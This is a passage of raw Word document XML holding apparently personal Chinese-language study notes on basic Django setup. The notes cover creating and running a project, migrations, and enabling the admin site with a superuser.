      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B83635">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>npm ERR! A complete log of this run can be found in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B96AEE9" w14:textId="793188CA" w:rsidR="00162DA7" w:rsidRDefault="00B83635" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83635">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>npm ERR!     C:\Users\ranja\AppData\Local\npm-cache\_logs\2023-12-11T10_12_11_842Z-debug.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0E74C" w14:textId="77777777" w:rsidR="00162DA7" w:rsidRDefault="00162DA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247D3AF9" w14:textId="275DC5F8" w:rsidR="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="638" w:name="_Toc159780068"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>3C Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="638"/>
    </w:p>
    <w:p w14:paraId="1ADE71D2" w14:textId="77777777" w:rsidR="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E6B051" w14:textId="4D7FBF2C" w:rsidR="00F63594" w:rsidRPr="00C05D72" w:rsidRDefault="00F63594" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="639" w:name="_Toc159780069"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建项目</w:t>
      </w:r>
      <w:bookmarkEnd w:id="639"/>
    </w:p>
    <w:p w14:paraId="62C137CA" w14:textId="4C15FDCB" w:rsidR="00C05D72" w:rsidRPr="00F63594" w:rsidRDefault="00F63594" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63594">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>django-admin startproject xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29862A8F" w14:textId="77777777" w:rsidR="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1B7230" w14:textId="77777777" w:rsidR="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F864CC" w14:textId="2A9E07ED" w:rsidR="00C05D72" w:rsidRDefault="00CE542E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="640" w:name="_Toc159780070"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行项目</w:t>
      </w:r>
      <w:bookmarkEnd w:id="640"/>
    </w:p>
    <w:p w14:paraId="0DC84401" w14:textId="77777777" w:rsidR="00294F18" w:rsidRDefault="00294F18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416ACCAA" w14:textId="0340B9F7" w:rsidR="00294F18" w:rsidRPr="00294F18" w:rsidRDefault="00294F18" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>此处如果不写</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.0.0.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，则默认只能</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>访问，写了</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.0.0.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>才可以外部访问，放入</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>尤为注意！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4101B1" w14:textId="6DE7492B" w:rsidR="00CE542E" w:rsidRPr="00CE542E" w:rsidRDefault="00CE542E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE542E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE542E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE542E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE542E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">.py runserver 0.0.0.0:8000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F92EC" w14:textId="77777777" w:rsidR="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E24D6BB" w14:textId="77777777" w:rsidR="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364E7AB5" w14:textId="77777777" w:rsidR="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55122A5B" w14:textId="77777777" w:rsidR="00C05D72" w:rsidRPr="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EFD394" w14:textId="71818206" w:rsidR="00C05D72" w:rsidRDefault="006B1AA1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="641" w:name="_Toc159780071"/>
      <w:r w:rsidRPr="006B1AA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Django makemigrations </w:t>
      </w:r>
      <w:r w:rsidRPr="006B1AA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006B1AA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> migrate </w:t>
      </w:r>
      <w:r w:rsidRPr="006B1AA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作用详解</w:t>
      </w:r>
      <w:r w:rsidR="00C54015">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00C54015">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>！重点</w:t>
      </w:r>
      <w:r w:rsidR="00C54015">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="641"/>
    </w:p>
    <w:p w14:paraId="4D2A3A08" w14:textId="0D22D639" w:rsidR="006B1AA1" w:rsidRDefault="006B1AA1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35856749" w14:textId="17105243" w:rsidR="00C05D72" w:rsidRDefault="00395173" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00395173">
        <w:t>https://blog.csdn.net/sinat_23133783/article/details/108692194</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D81E21" w14:textId="77777777" w:rsidR="00C05D72" w:rsidRDefault="00C05D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5308C42F" w14:textId="7B667949" w:rsidR="00C05D72" w:rsidRDefault="009D12A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于为什么要进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">makemigrations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> migrate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B2401" w14:textId="42A52CC0" w:rsidR="00C05D72" w:rsidRPr="00294F18" w:rsidRDefault="009D12A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>终端依次输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python manage.py makemigrations</w:t>
      </w:r>
      <w:r w:rsidR="00294F18" w:rsidRPr="00294F18">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;appname&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python manage.py migrate</w:t>
      </w:r>
      <w:r w:rsidRPr="00294F18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>进行表结构迁移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C476E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265D30B0" w14:textId="7558F806" w:rsidR="00917C6F" w:rsidRDefault="00DF0566" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="642" w:name="_Toc159780072"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="642"/>
    </w:p>
    <w:p w14:paraId="6F14745E" w14:textId="4114032C" w:rsidR="00DF0566" w:rsidRDefault="00FB6AE7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="643" w:name="_Toc159780073"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台</w:t>
      </w:r>
      <w:bookmarkEnd w:id="643"/>
    </w:p>
    <w:p w14:paraId="55A3638B" w14:textId="413953D9" w:rsidR="00DF0566" w:rsidRPr="00DF0566" w:rsidRDefault="00FB6AE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006A1BD" w14:textId="77777777" w:rsidR="00FB6AE7" w:rsidRDefault="00FB6AE7" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>INSTALLED_APPS = [</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'django.contrib.admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60218EBA" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00FB6AE7" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026D57A8" w14:textId="6BD4E3F0" w:rsidR="00917C6F" w:rsidRDefault="00FB6AE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中设置后台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A2853" w14:textId="77777777" w:rsidR="00FB6AE7" w:rsidRDefault="00FB6AE7" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D3139"/>
        </w:rPr>
        <w:t>admin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, admin.site.urls),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C87297" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00FB6AE7" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE0EB4B" w14:textId="64D9F169" w:rsidR="00917C6F" w:rsidRDefault="00FB6AE7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="644" w:name="_Toc159780074"/>
      <w:r w:rsidRPr="00FB6AE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建超级用户</w:t>
      </w:r>
      <w:bookmarkEnd w:id="644"/>
    </w:p>
    <w:p w14:paraId="12AF5DF6" w14:textId="2BF458C1" w:rsidR="00917C6F" w:rsidRDefault="00FB6AE7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB6AE7">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python manage.py createsuperuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4654E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F9F515A" w14:textId="2C0339B6" w:rsidR="00917C6F" w:rsidRDefault="00CC3B36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表不存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257DF8E" w14:textId="02EAD72D" w:rsidR="00CC3B36" w:rsidRDefault="00CC3B36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就迁移一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66939E2C" w14:textId="627B21D2" w:rsidR="00CC3B36" w:rsidRDefault="00CC3B36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>akemigrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680DEEE6" w14:textId="092C3C0D" w:rsidR="00CC3B36" w:rsidRDefault="00CC3B36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>igrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D98CE9D" w14:textId="77777777" w:rsidR="00CC3B36" w:rsidRDefault="00CC3B36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E00D8CF" w14:textId="3F1E530C" w:rsidR="00917C6F" w:rsidRDefault="0077153A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以管理模型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA8AF5" w14:textId="31B1021C" w:rsidR="0077153A" w:rsidRDefault="0077153A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>test_app/admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下，将之前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模型注册到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018A8BB8" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A201BDF" w14:textId="77777777" w:rsidR="0077153A" w:rsidRDefault="0077153A" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">django.contrib </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
